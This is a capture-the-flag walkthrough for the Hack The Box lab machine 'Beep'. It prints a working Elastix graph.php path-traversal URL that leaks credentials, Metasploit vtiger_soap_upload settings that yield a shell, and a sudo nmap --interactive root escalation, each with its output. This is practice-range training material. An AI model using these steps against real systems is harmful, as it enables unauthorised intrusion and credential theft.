Today we’re going to solve another CTF machine “Beep“. It is now a retired box and can be accessible if you’re a VIP member.
Introduction
Specifications
- Target OS: Linux
- Services: 22,25,80,110,111,143,443,993,995,3306,4445,10000
- IP Address: 10.10.10.7
- Difficulty: Medium
Weakness
- LFI vulnerablity
- Sudo NOPASSWD
Contents
- Getting user
- Getting root
Reconnaissance
As always, the first step consists of reconnaissance phase as port scanning.
Ports Scanning
During this step we’re gonna identify the target to see what we have behind the IP Address.
host port proto name state info ---- ---- ----- ---- ----- ---- 10.10.10.7 22 tcp ssh open OpenSSH 4.3 protocol 2.0 10.10.10.7 25 tcp smtp open Postfix smtpd 10.10.10.7 80 tcp http open Apache httpd 2.2.3 10.10.10.7 110 tcp pop3 open Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 10.10.10.7 111 tcp rpcbind open 2 RPC #100000 10.10.10.7 143 tcp imap open Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 10.10.10.7 443 tcp ssl/http open Apache httpd 2.2.3 (CentOS) 10.10.10.7 993 tcp ssl/imap open Cyrus imapd 10.10.10.7 995 tcp pop3 open Cyrus pop3d 10.10.10.7 3306 tcp mysql open MySQL unauthorized 10.10.10.7 4445 tcp upnotifyp open 10.10.10.7 10000 tcp http open MiniServ 1.570 Webmin httpd
We have a quite long list of services. HTTP is running so this is our primary target now.
Enumerate Directories
We a huge list of directories because there’s a Elastix CMS installed on Apache.
Let’s searchsploit elastix,
To read
searchsploit -x php/webapps/37637.pl
To copy exploit to current directory
searchsploit -m php/webapps/37637.pl .
Exploit: Elastix 2.2.0 - 'graph.php' Local File Inclusion
URL: https://www.exploit-db.com/exploits/37637/
Path: /usr/share/exploitdb/platforms/php/webapps/37637.pl
Copied to: /root/Documents/hackthebox/10.10.10.7/37637.pl
The proof of concept is extremely simple. Browsing to https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf% 00&module=Accounts&action will expose the credentials for AMPortal.
The box is vulnerable to password reuse, and it is possible to SSH in directly as the root user with the AMPDBPASS password.
Method 2
There’s another method to hack this box. Let’s start over again.
Port Scanning
During this step we’re gonna identify the target to see what we have behind the IP Address.
host port proto name state info ---- ---- ----- ---- ----- ---- 10.10.10.7 22 tcp ssh open OpenSSH 4.3 protocol 2.0 10.10.10.7 25 tcp smtp open Postfix smtpd 10.10.10.7 80 tcp http open Apache httpd 2.2.3 10.10.10.7 110 tcp pop3 open Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 10.10.10.7 111 tcp rpcbind open 2 RPC #100000 10.10.10.7 143 tcp imap open Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 10.10.10.7 443 tcp ssl/http open Apache httpd 2.2.3 (CentOS) 10.10.10.7 993 tcp ssl/imap open Cyrus imapd 10.10.10.7 995 tcp pop3 open Cyrus pop3d 10.10.10.7 3306 tcp mysql open MySQL unauthorized 10.10.10.7 4445 tcp upnotifyp open 10.10.10.7 10000 tcp http open MiniServ 1.570 Webmin httpd
We have a quite long list of services. HTTP is running so this is our primary target now.
Enumerate Directories
We a huge list of directories because there’s a Elastix CMS installed on Apache.
We have a login field either we can brute force or find an SQL injection vulnerability i tested both but unable to find them.
Let’s dig more into directories and see if we can find anything.
https://10.10.10.7/vtigercrm/
We can see another login portal for vtiger CRM 5.1.0 🙂 The first thing we should do is searchsploit vtiger.
So we found some metasploit modules as well let’s test them first to save our time.
msf > search vtiger Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/multi/http/vtiger_install_rce 2014-03-05 manual Vtiger Install Unauthenticated Remote Command Execution exploit/multi/http/vtiger_php_exec 2013-10-30 excellent vTigerCRM v5.4.0/v5.3.0 Authenticated Remote Code Execution exploit/multi/http/vtiger_soap_upload 2013-03-26 excellent vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload
We found our exploit let’s use it.
use exploit/multi/http/vtiger_soap_upload
After executing exploit we got an error let’s take a look at.
If you remember we have an SSL installed on server as well and this exploit also have an option to support SSL. Let’s enable it.
msf exploit(vtiger_soap_upload) > set SSL true msf exploit(vtiger_soap_upload) > set RPORT 443
After executing we got an shell 🙂
Inside /home/fanis directory we have found our user.txt flag.
Privilege Escalation
It’s time to get root.txt now we can use privilege escalation scripts to gather information or we can do some research manually first to save our time.
If you do sudo -l you can see many NOPASSWD commands which can lead us to getting root.
sudo -l
Matching Defaults entries for asterisk on this host:
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY"
User asterisk may run the following commands on this host:
(root) NOPASSWD: /sbin/shutdown
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/bin/yum
(root) NOPASSWD: /bin/touch
(root) NOPASSWD: /bin/chmod
(root) NOPASSWD: /bin/chown
(root) NOPASSWD: /sbin/service
(root) NOPASSWD: /sbin/init
(root) NOPASSWD: /usr/sbin/postmap
(root) NOPASSWD: /usr/sbin/postfix
(root) NOPASSWD: /usr/sbin/saslpasswd2
(root) NOPASSWD: /usr/sbin/hardware_detector
(root) NOPASSWD: /sbin/chkconfig
(root) NOPASSWD: /usr/sbin/elastix-helper
There’s nmap and if you google nmap privilege escalation you can find this command 🙂
sudo nmap --interactive Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ ) Welcome to Interactive Mode -- press h <enter> for help nmap> !sh id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) cd /root ls -la total 16308 drwxr-x--- 2 root root 4096 Apr 7 2017 . drwxr-xr-x 22 root root 4096 Dec 2 23:23 .. -rw------- 1 root root 1130 Dec 4 13:06 .bash_history -rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout -rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile -rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc -rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc -rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc -rw------- 1 root root 6025 Apr 7 2017 anaconda-ks.cfg -r-xr-xr-x 1 root root 190461 Aug 10 2011 elastix-pr-2.2-1.i386.rpm -rw-r--r-- 1 root root 18433 Apr 7 2017 install.log -rw-r--r-- 1 root root 0 Apr 7 2017 install.log.syslog -rw-r--r-- 1 root root 1 Apr 7 2017 postnochroot -rw------- 1 root root 33 Apr 7 2017 root.txt -r-xr-xr-x 1 root root 16358730 Oct 31 2011 webmin-1.570-1.noarch.rpm
